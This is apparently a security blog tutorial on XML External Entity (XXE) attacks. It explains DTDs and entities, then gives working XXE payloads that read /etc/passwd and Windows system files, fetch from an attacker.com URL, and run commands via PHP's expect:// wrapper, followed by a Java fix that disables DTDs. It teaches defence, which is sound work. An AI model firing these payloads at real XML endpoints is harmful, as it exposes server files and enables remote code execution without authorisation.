XML External Entities


Extensible Markup Language (XML) has an infamous feature called XML eXternal Entities (XXE). It is the most well-known XML attack vector and still has a high place in the OWASP Top 10 most common vulnerabilities list.

This blog post explains how to exploit the vulnerability to gain access to sensitive data and also how to mitigate it.

Introduction

XXE enables an attacker to craft malicious XML documents. When these documents are parsed by a vulnerable XML parser, data can be fetched from outside the document itself. This data will be parsed as the content of your chosen XML tag. The data can be the contents of a file or the response from an HTTP request.

Oftentimes the contents of an XML tag are displayed back to you, for example in a web page. This way you can view any sensitive data you’ve gained using XXE.

As this feature is a part of the main XML standard, it is usually enabled by default and must be turned off manually in a parser-specific way.

Understanding XXE and DTD

What is a DTD?

A DTD is a Document Type Definition, which defines the structure and the legal elements and attributes of an XML document.

Using a DTD, independent groups of people can agree on a standard document format for exchanging data. Applications can use DTDs to verify that XML data corresponds to the specified format.

If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> definition:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>Don't forget to bring my jacket!</body>
</note>

As you can see above, the DTD defines that there is a note element, which in turn has the child elements to, from, heading and body.

Entities

Some characters have a special meaning in XML, like the less than sign <, which defines the start of an XML tag. Another example is the & sign, which specifies the start of a character entity.”

You may already know the HTML entity: &nbsp;. This “no-breaking-space” entity is used in HTML, and it expands to insert an extra space in a document. Just like in HTML, entities are expanded in XML when a document is parsed by an XML parser.

Exploitation

Example code

Here are some examples about how to use XXE to read data from a variety of resources, courtesy of OWASP.

1) Reading /etc/passwd on Linux

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

2) Reading files on Windows

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

3) Making HTTP requests

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>

Step-by-step exploitation

Example application

Let’s say we have an application where you can leave notes that other people can read. An XML request to this application might look something like this:

<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>Don't forget to bring my jacket!</body>
</note>

The application parses the XML request and displays a note from Jane with the heading “Reminder” and the body “Don’t forget to bring my jacket!”.

Our goal in this example will be to read the contents of the /etc/passwd file. It’s a convenient file to use because you can usually count on it existing on a Linux system. We want the contents of /etc/passwd to appear in the body section of the note.

Malicious request

If External Entities are enabled, a malicious note could be created like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
     <!ELEMENT foo ANY >
     <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>&xxe;</body>
</note>

As a result, the note to Brian will have the contents of /etc/passwd in its body.

Other attacks

PHP Remote Code Execution

If the PHP “expect” module is loaded, we can get RCE.

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://id" >]>
    <creds>
       <user>&xxe;</user>
       <pass>mypass</pass>
    </creds>

Custom attacks on various applications

It used to be possible to get Remote Code Execution in many different code editors due to an XXE flaw. It was patched quickly, but it’s an interesting read.

Fixing

The easiest option is to disable DTDs entirely. The following code is in Java:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();

If disabling the DTD is not an option, then you must configure the XML parser to disable external entities. For more detailed information, refer to OWASP’s cheat sheet on the topic.

Conclusion

Any time you see XML used in an application, one of the first things to think about is if it’s vulnerable to an XXE attack. And when using XML in your own application, you should always check if External Entities are disabled or not.

Heino Sass Hallik